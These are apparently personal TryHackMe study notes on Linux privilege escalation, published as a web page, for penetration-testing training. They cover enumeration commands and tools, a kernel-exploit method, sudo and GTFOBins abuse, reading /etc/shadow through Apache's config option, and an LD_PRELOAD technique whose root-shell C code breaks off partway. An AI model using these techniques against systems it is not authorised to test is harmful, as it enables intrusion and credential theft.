<!doctype html>
<html lang="en" dir="ltr" class="docs-wrapper plugin-docs plugin-id-default docs-version-current docs-doc-page docs-doc-id-Jr Penetration Tester/Privilege Escalation/Linux Privilege Escalation" data-has-hydrated="false">
<head>
<meta charset="UTF-8">
<meta name="generator" content="Docusaurus v3.2.0">
<title data-rh="true">Linux Privilege Escalation | THM Notes</title><meta data-rh="true" name="viewport" content="width=device-width,initial-scale=1"><meta data-rh="true" name="twitter:card" content="summary_large_image"><meta data-rh="true" property="og:image" content="https://thm.pochacco.top/img/Pochacco-social-card.png"><meta data-rh="true" name="twitter:image" content="https://thm.pochacco.top/img/Pochacco-social-card.png"><meta data-rh="true" property="og:url" content="https://thm.pochacco.top/docs/Jr Penetration Tester/Privilege Escalation/Linux Privilege Escalation"><meta data-rh="true" property="og:locale" content="en"><meta data-rh="true" name="docusaurus_locale" content="en"><meta data-rh="true" name="docsearch:language" content="en"><meta data-rh="true" name="docusaurus_version" content="current"><meta data-rh="true" name="docusaurus_tag" content="docs-default-current"><meta data-rh="true" name="docsearch:version" content="current"><meta data-rh="true" name="docsearch:docusaurus_tag" content="docs-default-current"><meta data-rh="true" property="og:title" content="Linux Privilege Escalation | THM Notes"><meta data-rh="true" name="description" content="System"><meta data-rh="true" property="og:description" content="System"><link data-rh="true" rel="icon" href="/img/favicon.ico"><link data-rh="true" rel="canonical" href="https://thm.pochacco.top/docs/Jr Penetration Tester/Privilege Escalation/Linux Privilege Escalation"><link data-rh="true" rel="alternate" href="https://thm.pochacco.top/docs/Jr Penetration Tester/Privilege Escalation/Linux Privilege Escalation" hreflang="en"><link data-rh="true" rel="alternate" href="https://thm.pochacco.top/docs/Jr Penetration Tester/Privilege Escalation/Linux Privilege Escalation" hreflang="x-default"><link rel="stylesheet" href="/assets/css/styles.487c242f.css">
<script src="/assets/js/runtime~main.32f33024.js" defer="defer"></script>
<script src="/assets/js/main.7573ae7a.js" defer="defer"></script>
</head>
<body class="navigation-with-keyboard">
<script>!function(){function t(t){document.documentElement.setAttribute("data-theme",t)}var e=function(){try{return new URLSearchParams(window.location.search).get("docusaurus-theme")}catch(t){}}()||function(){try{return localStorage.getItem("theme")}catch(t){}}();t(null!==e?e:"light")}(),function(){try{const c=new URLSearchParams(window.location.search).entries();for(var[t,e]of c)if(t.startsWith("docusaurus-data-")){var a=t.replace("docusaurus-data-","data-");document.documentElement.setAttribute(a,e)}}catch(t){}}()</script><div id="__docusaurus"><div role="region" aria-label="Skip to main content"><a class="skipToContent_fXgn" href="#__docusaurus_skipToContent_fallback">Skip to main content</a></div><nav aria-label="Main" class="navbar navbar--fixed-top"><div class="navbar__inner"><div class="navbar__items"><button aria-label="Toggle navigation bar" aria-expanded="false" class="navbar__toggle clean-btn" type="button"><svg width="30" height="30" viewBox="0 0 30 30" aria-hidden="true"><path stroke="currentColor" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" d="M4 7h22M4 15h22M4 23h22"></path></svg></button><a class="navbar__brand" href="/"><div class="navbar__logo"><img src="/img/logo.png" alt="PochaccoTop Logo" class="themedComponent_mlkZ themedComponent--light_NVdE"><img src="/img/logo.png" alt="PochaccoTop Logo" class="themedComponent_mlkZ themedComponent--dark_xIcU"></div><b class="navbar__title text--truncate">TryHackMe Notes</b></a><a aria-current="page" class="navbar__item navbar__link navbar__link--active" href="/docs/Intro">TryHackme</a></div><div class="navbar__items navbar__items--right"><a href="https://index.pochacco.top/en/" target="_blank" rel="noopener noreferrer" class="navbar__item navbar__link">Index<svg width="13.5" height="13.5" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a><a href="https://pochacco.top" target="_blank" rel="noopener noreferrer" class="navbar__item navbar__link">MainSite<svg width="13.5" height="13.5" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a><a href="https://github.com/pikachu233666" target="_blank" rel="noopener noreferrer" class="navbar__item navbar__link header-github-link" aria-label="GitHub repository"></a><div class="toggle_vylO colorModeToggle_DEke"><button class="clean-btn toggleButton_gllP toggleButtonDisabled_aARS" type="button" disabled="" title="Switch between dark and light mode (currently light mode)" aria-label="Switch between dark and light mode (currently light mode)" aria-live="polite"><svg viewBox="0 0 24 24" width="24" height="24" class="lightToggleIcon_pyhR"><path fill="currentColor" d="M12,9c1.65,0,3,1.35,3,3s-1.35,3-3,3s-3-1.35-3-3S10.35,9,12,9 M12,7c-2.76,0-5,2.24-5,5s2.24,5,5,5s5-2.24,5-5 S14.76,7,12,7L12,7z M2,13l2,0c0.55,0,1-0.45,1-1s-0.45-1-1-1l-2,0c-0.55,0-1,0.45-1,1S1.45,13,2,13z M20,13l2,0c0.55,0,1-0.45,1-1 s-0.45-1-1-1l-2,0c-0.55,0-1,0.45-1,1S19.45,13,20,13z M11,2v2c0,0.55,0.45,1,1,1s1-0.45,1-1V2c0-0.55-0.45-1-1-1S11,1.45,11,2z M11,20v2c0,0.55,0.45,1,1,1s1-0.45,1-1v-2c0-0.55-0.45-1-1-1C11.45,19,11,19.45,11,20z M5.99,4.58c-0.39-0.39-1.03-0.39-1.41,0 c-0.39,0.39-0.39,1.03,0,1.41l1.06,1.06c0.39,0.39,1.03,0.39,1.41,0s0.39-1.03,0-1.41L5.99,4.58z M18.36,16.95 c-0.39-0.39-1.03-0.39-1.41,0c-0.39,0.39-0.39,1.03,0,1.41l1.06,1.06c0.39,0.39,1.03,0.39,1.41,0c0.39-0.39,0.39-1.03,0-1.41 L18.36,16.95z M19.42,5.99c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06c-0.39,0.39-0.39,1.03,0,1.41 s1.03,0.39,1.41,0L19.42,5.99z M7.05,18.36c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06 c-0.39,0.39-0.39,1.03,0,1.41s1.03,0.39,1.41,0L7.05,18.36z"></path></svg><svg viewBox="0 0 24 24" width="24" height="24" class="darkToggleIcon_wfgR"><path fill="currentColor" d="M9.37,5.51C9.19,6.15,9.1,6.82,9.1,7.5c0,4.08,3.32,7.4,7.4,7.4c0.68,0,1.35-0.09,1.99-0.27C17.45,17.19,14.93,19,12,19 c-3.86,0-7-3.14-7-7C5,9.07,6.81,6.55,9.37,5.51z M12,3c-4.97,0-9,4.03-9,9s4.03,9,9,9s9-4.03,9-9c0-0.46-0.04-0.92-0.1-1.36 c-0.98,1.37-2.58,2.26-4.4,2.26c-2.98,0-5.4-2.42-5.4-5.4c0-1.81,0.89-3.42,2.26-4.4C12.92,3.04,12.46,3,12,3L12,3z"></path></svg></button></div><div class="navbarSearchContainer_Bca1"></div></div></div><div role="presentation" class="navbar-sidebar__backdrop"></div></nav><div id="__docusaurus_skipToContent_fallback" class="main-wrapper mainWrapper_z2l0"><div class="docsWrapper_hBAB"><button aria-label="Scroll back to top" class="clean-btn theme-back-to-top-button backToTopButton_sjWU" type="button"></button><div class="docRoot_UBD9"><aside class="theme-doc-sidebar-container docSidebarContainer_YfHR"><div class="sidebarViewport_aRkj"><div class="sidebar_njMd"><nav aria-label="Docs sidebar" class="menu thin-scrollbar menu_SIkG"><ul class="theme-doc-sidebar-menu menu__list"><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-1 menu__list-item"><a class="menu__link" href="/docs/Intro">TryHackMe</a></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" href="/docs/Introduction to Cyber Security/Introduction to Cyber Security/Careers in Cyber">Introduction to Cyber Security</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" href="/docs/Introduction to Cyber Security/Introduction to Cyber Security/Careers in Cyber">Pre Security</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret menu__link--active" role="button" aria-expanded="true" href="/docs/Introduction to Cyber Security/Introduction to Cyber Security/Careers in Cyber">Jr Penetration Tester</a></div><ul style="display:block;overflow:visible;height:auto" class="menu__list"><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/docs/Introduction to Cyber Security/Introduction to Cyber Security/Careers in Cyber">Introduction to Cyber Security</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/docs/Jr Penetration Tester/Introduction to Pentesting/Pentesting Fundamentals">Introduction to Pentesting</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/docs/Jr Penetration Tester/Introduction to Web Hacking/Authentication Bypass">Introduction to Web Hacking</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/docs/Jr Penetration Tester/Burp Suite/Extensions">Burp Suite</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/docs/Jr Penetration Tester/Network Security/Active Reconnaissance">Network Security</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/docs/Jr Penetration Tester/Vulnerability Research/Exploit Vulnerabilities">Vulnerability Research</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/docs/Jr Penetration Tester/Metasploit/Exploitation">Metasploit</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret menu__link--active" role="button" aria-expanded="true" tabindex="0" href="/docs/Jr Penetration Tester/Privilege Escalation/Linux Privilege Escalation">Privilege Escalation</a></div><ul style="display:block;overflow:visible;height:auto" class="menu__list"><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link menu__link--active" aria-current="page" tabindex="0" href="/docs/Jr Penetration Tester/Privilege Escalation/Linux Privilege Escalation">Linux Privilege Escalation</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/docs/Jr Penetration Tester/Privilege Escalation/What the Shell">What the Shell</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/docs/Jr Penetration Tester/Privilege Escalation/Windows Privilege Escalation">Windows Privilege Escalation</a></li></ul></li></ul></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" href="/docs/Events/The Witch&#x27;s Cauldron">Events</a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" href="/docs/Others/Bash Scripting">Others</a></div></li></ul></nav></div></div></aside><main class="docMainContainer_TBSr"><div class="container padding-top--md padding-bottom--lg"><div class="row"><div class="col docItemCol_VOVn"><div class="docItemContainer_Djhp"><article><nav class="theme-doc-breadcrumbs breadcrumbsContainer_Z_bl" aria-label="Breadcrumbs"><ul class="breadcrumbs" itemscope="" itemtype="https://schema.org/BreadcrumbList"><li class="breadcrumbs__item"><a aria-label="Home page" class="breadcrumbs__link" href="/"><svg viewBox="0 0 24 24" class="breadcrumbHomeIcon_YNFT"><path d="M10 19v-5h4v5c0 .55.45 1 1 1h3c.55 0 1-.45 1-1v-7h1.7c.46 0 .68-.57.33-.87L12.67 3.6c-.38-.34-.96-.34-1.34 0l-8.36 7.53c-.34.3-.13.87.33.87H5v7c0 .55.45 1 1 1h3c.55 0 1-.45 1-1z" fill="currentColor"></path></svg></a></li><li class="breadcrumbs__item"><span class="breadcrumbs__link">Jr Penetration Tester</span><meta itemprop="position" content="1"></li><li class="breadcrumbs__item"><span class="breadcrumbs__link">Privilege Escalation</span><meta itemprop="position" content="2"></li><li itemscope="" itemprop="itemListElement" itemtype="https://schema.org/ListItem" class="breadcrumbs__item breadcrumbs__item--active"><span class="breadcrumbs__link" itemprop="name">Linux Privilege Escalation</span><meta itemprop="position" content="3"></li></ul></nav><div class="tocCollapsible_ETCw theme-doc-toc-mobile tocMobile_ITEo"><button type="button" class="clean-btn tocCollapsibleButton_TO0P">On this page</button></div><div class="theme-doc-markdown markdown"><p>#Linux #System</p>
<p>At it&#x27;s core, Privilege Escalation usually involves going from a lower permission account to a higher permission one. More technically, it&#x27;s the exploitation of a vulnerability, design flaw, or configuration oversight in an operating system or application to gain unauthorized access to resources that are usually restricted from the users.</p>
<h1>Enumeration</h1>
<p>Enumeration is the first step you have to take once you gain access to any system. You may have accessed the system by exploiting a critical vulnerability that resulted in root-level access or just found a way to send commands using a low privileged account. Penetration testing engagements, unlike CTF machines, don&#x27;t end once you gain access to a specific system or user privilege level. As you will see, enumeration is as important during the post-compromise phase as it is before.</p>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="hostname">hostname<a href="#hostname" class="hash-link" aria-label="Direct link to hostname" title="Direct link to hostname">​</a></h2>
<p>The <code>hostname</code> command will return the hostname of the target machine. Although this value can easily be changed or have a relatively meaningless string (e.g. Ubuntu-3487340239), in some cases, it can provide information about the target system’s role within the corporate network (e.g. SQL-PROD-01 for a production SQL server).</p>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="uname--a">uname -a<a href="#uname--a" class="hash-link" aria-label="Direct link to uname -a" title="Direct link to uname -a">​</a></h2>
<p>Will print system information giving us additional detail about the kernel used by the system. This will be useful when searching for any potential kernel vulnerabilities that could lead to privilege escalation.</p>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="procversion">/proc/version<a href="#procversion" class="hash-link" aria-label="Direct link to /proc/version" title="Direct link to /proc/version">​</a></h2>
<p>The proc filesystem (procfs) provides information about the target system processes. You will find proc on many different Linux flavours, making it an essential tool to have in your arsenal.</p>
<p>Looking at <code>/proc/version</code> may give you information on the kernel version and additional data such as whether a compiler (e.g. GCC) is installed.</p>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="etcissue">/etc/issue<a href="#etcissue" class="hash-link" aria-label="Direct link to /etc/issue" title="Direct link to /etc/issue">​</a></h2>
<p>Systems can also be identified by looking at the <code>/etc/issue</code> file. This file usually contains some information about the operating system but can easily be customized or changed. While on the subject, any file containing system information can be customized or changed. For a clearer understanding of the system, it is always good to look at all of these.</p>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="ps-command">ps Command<a href="#ps-command" class="hash-link" aria-label="Direct link to ps Command" title="Direct link to ps Command">​</a></h2>
<p>The <code>ps</code> command is an effective way to see the running processes on a Linux system. Typing <code>ps</code> on your terminal will show processes for the current shell.</p>
<p>The output of the <code>ps</code> (Process Status) will show the following</p>
<ul>
<li>PID: The process ID (unique to the process)</li>
<li>TTY: Terminal type used by the user</li>
<li>Time: Amount of CPU time used by the process (this is NOT the time this process has been running for)</li>
<li>CMD: The command or executable running (will NOT display any command line parameter)</li>
</ul>
<p>The “ps” command provides a few useful options.</p>
<ul>
<li><code>ps -A</code>: View all running processes</li>
<li><code>ps axjf</code>: View process tree</li>
<li><code>ps aux</code>: The <code>aux</code> option will show processes for all users (a), display the user that launched the process (u), and show processes that are not attached to a terminal (x). Looking at the ps aux command output, we can have a better understanding of the system and potential vulnerabilities.</li>
</ul>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="env">env<a href="#env" class="hash-link" aria-label="Direct link to env" title="Direct link to env">​</a></h2>
<p>The <code>env</code> command will show environmental variables.
The PATH variable may have a compiler or a scripting language (e.g. Python) that could be used to run code on the target system or leveraged for privilege escalation.</p>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="sudo--l">sudo -l<a href="#sudo--l" class="hash-link" aria-label="Direct link to sudo -l" title="Direct link to sudo -l">​</a></h2>
<p>The target system may be configured to allow users to run some (or all) commands with root privileges. The <code>sudo -l</code> command can be used to list all commands your user can run using <code>sudo</code>.</p>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="ls">ls<a href="#ls" class="hash-link" aria-label="Direct link to ls" title="Direct link to ls">​</a></h2>
<p>One of the common commands used in Linux is probably <code>ls</code>.</p>
<p>While looking for potential privilege escalation vectors, please remember to always use the <code>ls</code> command with the <code>-la</code> parameter.</p>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="id">Id<a href="#id" class="hash-link" aria-label="Direct link to Id" title="Direct link to Id">​</a></h2>
<p>The <code>id</code> command will provide a general overview of the user’s privilege level and group memberships.</p>
<p>It is worth remembering that the <code>id</code> command can also be used to obtain the same information for another user.</p>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="etcpasswd">/etc/passwd<a href="#etcpasswd" class="hash-link" aria-label="Direct link to /etc/passwd" title="Direct link to /etc/passwd">​</a></h2>
<p>Reading the <code>/etc/passwd</code> file can be an easy way to discover users on the system.</p>
<p>While the output can be long and a bit intimidating, it can easily be cut and converted to a useful list for brute-force attacks.</p>
<p>Remember that this will return all users, some of which are system or service users that would not be very useful. Another approach could be to grep for “home” as real users will most likely have their folders under the “home” directory.</p>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="history">history<a href="#history" class="hash-link" aria-label="Direct link to history" title="Direct link to history">​</a></h2>
<p>Looking at earlier commands with the <code>history</code> command can give us some idea about the target system and, albeit rarely, have stored information such as passwords or usernames.</p>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="ifconfig">ifconfig<a href="#ifconfig" class="hash-link" aria-label="Direct link to ifconfig" title="Direct link to ifconfig">​</a></h2>
<p>The target system may be a pivoting point to another network. The <code>ifconfig</code> command will give us information about the network interfaces of the system. The example below shows the target system has three interfaces (eth0, tun0, and tun1). Our attacking machine can reach the eth0 interface but can not directly access the two other networks.</p>
<p>This can be confirmed using the <code>ip route</code> command to see which network routes exist.</p>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="netstat">netstat<a href="#netstat" class="hash-link" aria-label="Direct link to netstat" title="Direct link to netstat">​</a></h2>
<p>Following an initial check for existing interfaces and network routes, it is worth looking into existing communications. The <code>netstat</code> command can be used with several different options to gather information on existing connections.</p>
<ul>
<li><code>netstat -a</code>: shows all listening ports and established connections.</li>
<li><code>netstat -at</code> or <code>netstat -au</code> can also be used to list TCP or UDP protocols respectively.</li>
<li><code>netstat -l</code>: list ports in “listening” mode. These ports are open and ready to accept incoming connections. This can be used with the “t” option to list only ports that are listening using the TCP protocol</li>
<li><code>netstat -s</code>: list network usage statistics by protocol. This can also be used with the <code>-t</code> or <code>-u</code> options to limit the output to a specific protocol.</li>
<li><code>netstat -tp</code>: list connections with the service name and PID information.
This can also be used with the <code>-l</code> option to list listening ports
We can see the “PID/Program name” column is empty as this process is owned by another user.</li>
<li><code>netstat -i</code>: Shows interface statistics. We see below that “eth0” and “tun0” are more active than “tun1”.</li>
</ul>
<p>The <code>netstat</code> usage you will probably see most often in blog posts, write-ups, and courses is <code>netstat -ano</code> which could be broken down as follows</p>
<ul>
<li><code>-a</code>: Display all sockets</li>
<li><code>-n</code>: Do not resolve names</li>
<li><code>-o</code>: Display timers</li>
</ul>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="find-command">find Command<a href="#find-command" class="hash-link" aria-label="Direct link to find Command" title="Direct link to find Command">​</a></h2>
<p>Searching the target system for important information and potential privilege escalation vectors can be fruitful. The built-in “find” command is useful and worth keeping in your arsenal.</p>
<p>Below are some useful examples for the “find” command.</p>
<p>Find files</p>
<ul>
<li><code>find . -name flag1.txt</code>: find the file named “flag1.txt” in the current directory</li>
<li><code>find /home -name flag1.txt</code>: find the file names “flag1.txt” in the /home directory</li>
<li><code>find / -type d -name config</code>: find the directory named config under “/”</li>
<li><code>find / -type f -perm 0777</code>: find files with the 777 permissions (files readable, writable, and executable by all users)</li>
<li><code>find / -perm a=x</code>: find executable files</li>
<li><code>find /home -user frank</code>: find all files for user “frank” under “/home”</li>
<li><code>find / -mtime 10</code>: find files that were modified in the last 10 days</li>
<li><code>find / -atime 10</code>: find files that were accessed in the last 10 day</li>
<li><code>find / -cmin -60</code>: find files changed within the last hour (60 minutes)</li>
<li><code>find / -amin -60</code>: find files accesses within the last hour (60 minutes)</li>
<li><code>find / -size 50M</code>: find files with a 50 MB size</li>
</ul>
<p>This command can also be used with (+) and (-) signs to specify a file that is larger or smaller than the given size.</p>
<p>Folders and files that can be written to or executed from</p>
<ul>
<li><code>find / -writable -type d 2&gt;/dev/null</code> : Find world-writeable folders</li>
<li><code>find / -perm -222 -type d 2&gt;/dev/null</code>: Find world-writeable folders</li>
<li><code>find / -perm -o w -type d 2&gt;/dev/null</code>: Find world-writeable folders</li>
</ul>
<p>The reason we see three different “find” commands that could potentially lead to the same result can be seen in the manual document. As you can see below, the perm parameter affects the way “find” works.</p>
<ul>
<li><code>find / -perm -o x -type d 2&gt;/dev/null</code> : Find world-executable folders</li>
</ul>
<p>Find development tools and supported languages</p>
<ul>
<li><code>find / -name perl*</code></li>
<li><code>find / -name python*</code></li>
<li><code>find / -name gcc*</code></li>
</ul>
<p>Find specific file permissions
Below is a short example used to find files that have the SUID bit set. The SUID bit allows the file to run with the privilege level of the account that owns it, rather than the account which runs it. This allows for an interesting privilege escalation path,we will see in more details on task 6. The example below is given to complete the subject on the “find” command.</p>
<ul>
<li><code>find / -perm -u=s -type f 2&gt;/dev/null</code>: Find files with the SUID bit, which allows us to run the file with a higher privilege level than the current user.</li>
</ul>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="general-linux-commands">General Linux Commands<a href="#general-linux-commands" class="hash-link" aria-label="Direct link to General Linux Commands" title="Direct link to General Linux Commands">​</a></h2>
<p>As we are in the Linux realm, familiarity with Linux commands, in general, will be very useful. Please spend some time getting comfortable with commands such as <code>find</code>, <code>locate</code>, <code>grep</code>, <code>cut</code>, <code>sort</code>, etc.</p>
<h1>Automated Enumeration Tools</h1>
<p>The target system’s environment will influence the tool you will be able to use. For example, you will not be able to run a tool written in Python if it is not installed on the target system. This is why it would be better to be familiar with a few rather than having a single go-to tool.</p>
<ul>
<li><a href="https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS" target="_blank" rel="noopener noreferrer">LinPeas</a></li>
<li><a href="https://github.com/rebootuser/LinEnum" target="_blank" rel="noopener noreferrer">LinEnum</a></li>
<li><a href="https://github.com/mzet-/linux-exploit-suggester" target="_blank" rel="noopener noreferrer">LES (Linux Exploit Suggester)</a></li>
<li><a href="https://github.com/diego-treitos/linux-smart-enumeration" target="_blank" rel="noopener noreferrer">Linux Smart Enumeration</a></li>
<li><a href="https://github.com/linted/linuxprivchecker" target="_blank" rel="noopener noreferrer">Linux Priv Checker</a></li>
</ul>
<h1>Kernel Exploits</h1>
<p>Privilege escalation ideally leads to root privileges. This can sometimes be achieved simply by exploiting an existing vulnerability, or in some cases by accessing another user account that has more privileges, information, or access.</p>
<p>Unless a single vulnerability leads to a root shell, the privilege escalation process will rely on misconfigurations and lax permissions.</p>
<p>The kernel on Linux systems manages the communication between components such as the memory on the system and applications. This critical function requires the kernel to have specific privileges; thus, a successful exploit will potentially lead to root privileges.</p>
<p>The Kernel exploit methodology is simple</p>
<ol>
<li>Identify the kernel version</li>
<li>Search and find an exploit code for the kernel version of the target system</li>
<li>Run the exploit</li>
</ol>
<p>Although it looks simple, please remember that a failed kernel exploit can lead to a system crash. Make sure this potential outcome is acceptable within the scope of your penetration testing engagement before attempting a kernel exploit.</p>
<p><strong>Research sources</strong></p>
<ol>
<li>Based on your findings, you can use Google to search for an existing exploit code.</li>
<li>Sources such as <a href="https://www.linuxkernelcves.com/cves" target="_blank" rel="noopener noreferrer">https://www.linuxkernelcves.com/cves</a> can also be useful.</li>
<li>Another alternative would be to use a script like LES (Linux Exploit Suggester) but remember that these tools can generate false positives (report a kernel vulnerability that does not affect the target system) or false negatives (not report any kernel vulnerabilities although the kernel is vulnerable).</li>
</ol>
<p><strong>Hints/Notes</strong></p>
<ol>
<li>Being too specific about the kernel version when searching for exploits on Google, Exploit-db, or searchsploit</li>
<li>Be sure you understand how the exploit code works BEFORE you launch it. Some exploit codes can make changes on the operating system that would make them unsecured in further use or make irreversible changes to the system, creating problems later. Of course, these may not be great concerns within a lab or CTF environment, but these are absolute no-nos during a real penetration testing engagement.</li>
<li>Some exploits may require further interaction once they are run. Read all comments and instructions provided with the exploit code.</li>
<li>You can transfer the exploit code from your machine to the target system using the <code>SimpleHTTPServer</code> Python module and <code>wget</code> respectively.</li>
</ol>
<h1>Sudo</h1>
<p>The sudo command, by default, allows you to run a program with root privileges. Under some conditions, system administrators may need to give regular users some flexibility on their privileges. For example, a junior SOC analyst may need to use Nmap regularly but would not be cleared for full root access. In this situation, the system administrator can allow this user to only run Nmap with root privileges while keeping its regular privilege level throughout the rest of the system.</p>
<p>Any user can check its current situation related to root privileges using the <code>sudo -l</code> command.</p>
<p><a href="https://gtfobins.github.io/" target="_blank" rel="noopener noreferrer">https://gtfobins.github.io/</a> is a valuable source that provides information on how any program, on which you may have sudo rights, can be used.</p>
<p><strong>Leverage application functions</strong><br>
<!-- -->Some applications will not have a known exploit within this context. Such an application you may see is the Apache2 server.</p>
<p>In this case, we can use a &quot;hack&quot; to leak information leveraging a function of the application. Apache2 has an option that supports loading alternative configuration files (<code>-f</code> : specify an alternate ServerConfigFile).</p>
<p>Loading the <code>/etc/shadow</code> file using this option will result in an error message that includes the first line of the <code>/etc/shadow</code> file.</p>
<p><strong>Leverage LD_PRELOAD</strong>
On some systems, you may see the LD_PRELOAD environment option.</p>
<p>LD_PRELOAD is a function that allows any program to use shared libraries. This <a href="https://rafalcieslak.wordpress.com/2013/04/02/dynamic-linker-tricks-using-ld_preload-to-cheat-inject-features-and-investigate-programs/" target="_blank" rel="noopener noreferrer">blog post</a> will give you an idea about the capabilities of LD_PRELOAD. If the &quot;env_keep&quot; option is enabled we can generate a shared library which will be loaded and executed before the program is run. Please note the LD_PRELOAD option will be ignored if the real user ID is different from the effective user ID.</p>
<p>The steps of this privilege escalation vector can be summarized as follows</p>
<ol>
<li>Check for LD_PRELOAD (with the env_keep option)</li>
<li>Write a simple C code compiled as a share object (.so extension) file</li>
<li>Run the program with sudo rights and the LD_PRELOAD option pointing to our .so file</li>
</ol>
<p>The C code will simply spawn a root shell and can be written as follows</p>
<div class="language-c codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-c codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token macro property directive-hash" style="color:#36acaa">#</span><span class="token macro property directive keyword" style="color:#00009f">include</span><span class="token macro property" style="color:#36acaa"> </span><span class="token macro property string" style="color:#e3116c">&lt;stdio.h&gt;</span><span class="token macro property" style="color:#36acaa">  </span><span class="token plain"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"></span><span class="token macro property directive-hash" style="color:#36acaa">#</span><span class="token macro property directive keyword" style="color:#00009f">include</span><span class="token macro property" style="color:#36acaa"> </span><span class="token macro property string" style="color:#e3116c">&lt;sys/types.h&gt;</span><span class="token macro property" style="color:#36acaa">  </span><span class="token plain"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"></span><span class="token macro property directive-hash" style="color:#36acaa">#</span><span class="token macro property directive keyword" style="color:#00009f">include</span><span class="token macro property" style="color:#36acaa"> </span><span class="token macro property string" style="color:#e3116c">&lt;stdlib.h&gt;</span><span class="token macro property" style="color:#36acaa">  </span><span class="token plain"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">  </span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"></span><span class="token keyword" style="color:#00009f">void</span><span class="token plain"> </span><span class="token function" style="color:#d73a49">_init</span><span class="token punctuation" 